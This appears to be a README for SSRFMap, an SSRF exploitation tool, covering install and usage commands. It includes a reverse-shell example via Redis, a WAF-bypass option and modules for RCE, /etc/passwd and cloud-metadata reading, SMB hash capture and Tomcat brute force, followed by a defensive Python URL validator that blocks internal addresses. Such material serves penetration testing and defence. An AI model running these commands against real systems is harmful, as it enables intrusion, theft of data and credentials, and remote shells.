SSRFMap – Automated SSRF Fuzzer and Exploitation Tool
Server Side Request Forgery (SSRF) is a vulnerability in which an attacker forces a server to perform requests on their behalf. SSRF is often used to reach other services through the vulnerable server; this framework aims to find and exploit those services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
Basic install from the GitHub repository:
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
pip3 install -r requirements.txt
python3 ssrfmap.py
Usage:
ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l HANDLER]
           [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT]
           [--ssl [SSL]] [--level [LEVEL]]
Optional arguments:
  -h, --help          show this help message and exit
  -r REQFILE          SSRF request file
  -p PARAM            SSRF parameter to target
  -m MODULES          SSRF modules to enable
  -l HANDLER          Start a handler for a reverse shell
  --lhost LHOST       LHOST for the reverse shell
  --lport LPORT       LPORT for the reverse shell
  --uagent USERAGENT  User-Agent to use
  --ssl [SSL]         Use HTTPS without certificate verification
  --level [LEVEL]     Level of test to perform (1-5, default: 1)
The default way to use this script is the following.
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
# Launch a portscan against an HTTPS endpoint using a custom User-Agent
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
# Trigger a reverse shell through a Redis instance
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
# -l creates a listener for the reverse shell on the specified port
# --lhost and --lport work like in Metasploit: these values are used to build the reverse shell payload
# --level: tweaks the payloads in order to bypass some IDS/WAF rules, e.g. 127.0.0.1 -> [::] -> 0000: -> ...
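The --level option above exists because filters that string-match "127.0.0.1" are defeated by other spellings of the same address. The defender's counterpart is to canonicalise the target host and decide on the resolved address rather than on the text. The following check is an added example and is not part of SSRFmap; it assumes a server-side fetcher that receives a user-controlled URL, and the DNS records in fake_resolver are constructed so it runs offline. It blocks loopback, private, link-local (which covers the 169.254.169.254 metadata endpoint used by the cloud modules), multicast, reserved and unspecified addresses in IPv4, IPv6, IPv4-mapped IPv6 and bare-integer form.

```python
"""Outbound-URL validation for a server-side fetcher (SSRF mitigation).

Added example, not part of SSRFmap. Decides on the canonical address of the
target host instead of string-matching "127.0.0.1".
"""
import ipaddress
import socket
from typing import Callable, List, Optional, Tuple, Union
from urllib.parse import urlparse

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Resolver = Callable[[str], List[str]]


def _dns_resolve(host: str) -> List[str]:
    """Default resolver: every A/AAAA record for host (needs network access)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _literal_ip(host: str) -> Optional[IPAddr]:
    """Parse a host written as a numeric literal, or return None.

    Handles dotted IPv4, IPv6 (urlparse already strips the brackets of [::])
    and the bare-integer forms 2130706433 / 0x7f000001 that mean 127.0.0.1.
    """
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))
    except ValueError:
        return None


def _blocked(addr: IPAddr) -> bool:
    """True for any address a user-supplied URL must not reach."""
    mapped = getattr(addr, "ipv4_mapped", None)  # ::ffff:127.0.0.1 -> 127.0.0.1
    if mapped is not None:
        addr = mapped
    # 169.254.169.254 (cloud metadata) falls under is_link_local; 0.0.0.0 and ::
    # under is_unspecified; is_private covers RFC 1918, 127/8 and similar.
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_outbound_url(url: str, resolver: Resolver = _dns_resolve) -> Tuple[bool, str]:
    """Return (allowed, reason) for a URL the server is asked to fetch.

    `resolver` is injectable so the check can run offline in tests. A hostname
    is accepted only if *every* address it resolves to is public, because a
    name may carry one public and one internal record.
    """
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} is not allowed"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL are not allowed"  # http://trusted@127.0.0.1/
    literal = _literal_ip(host)
    if literal is not None:
        candidates = [literal]
    else:
        try:
            candidates = [ipaddress.ip_address(a) for a in resolver(host)]
        except (socket.gaierror, ValueError) as exc:
            return False, f"cannot resolve {host!r}: {exc}"
        if not candidates:
            return False, f"{host!r} resolved to no address"
    for addr in candidates:
        if _blocked(addr):
            return False, f"{host!r} -> {addr} is not a public address"
    return True, "ok"


def fake_resolver(host: str) -> List[str]:
    """Constructed DNS table so the demo runs offline; the records are invented."""
    table = {
        "example.org": ["93.184.216.34"],
        "intranet.corp": ["10.0.0.5"],
        "split.example": ["93.184.216.34", "127.0.0.1"],  # one public, one internal record
    }
    if host not in table:
        raise socket.gaierror(f"constructed resolver has no record for {host}")
    return table[host]


if __name__ == "__main__":
    for u in ["https://example.org/", "http://127.0.0.1:6379/", "http://[::]/",
              "http://0/", "http://2130706433/", "http://169.254.169.254/latest/meta-data/",
              "http://[::ffff:127.0.0.1]/", "https://split.example/", "gopher://127.0.0.1/"]:
        print(u, "->", check_outbound_url(u, fake_resolver))
```

Two caveats apply when wiring this into a real fetcher: the address checked must be the address connected to (resolve once, connect to that IP and send the original Host header, otherwise a DNS answer that changes between check and fetch reopens the hole), and every redirect target must go through the same check before it is followed.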
A quick way to test the framework is the SSRF service in data/example.py.
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
Modules
The following modules are already implemented and can be used with the -m argument.
Name          Description
fastcgi       FastCGI RCE
redis         Redis RCE
github        GitHub Enterprise RCE
zabbix        Zabbix RCE
mysql         MySQL command execution
docker        Docker information leaks via the API
smtp          SMTP send mail
portscan      Scan ports on the host
networkscan   HTTP ping sweep over the network
readfiles     Read files such as /etc/passwd
alibaba       Read files from the cloud provider (e.g. meta-data, user-data)
aws           Read files from the cloud provider (e.g. meta-data, user-data)
gce           Read files from the cloud provider (e.g. meta-data, user-data)
digitalocean  Read files from the cloud provider (e.g. meta-data, user-data)
socksproxy    SOCKS4 proxy
smbhash       Force an SMB authentication via a UNC path
tomcat        Brute-force attack against Tomcat Manager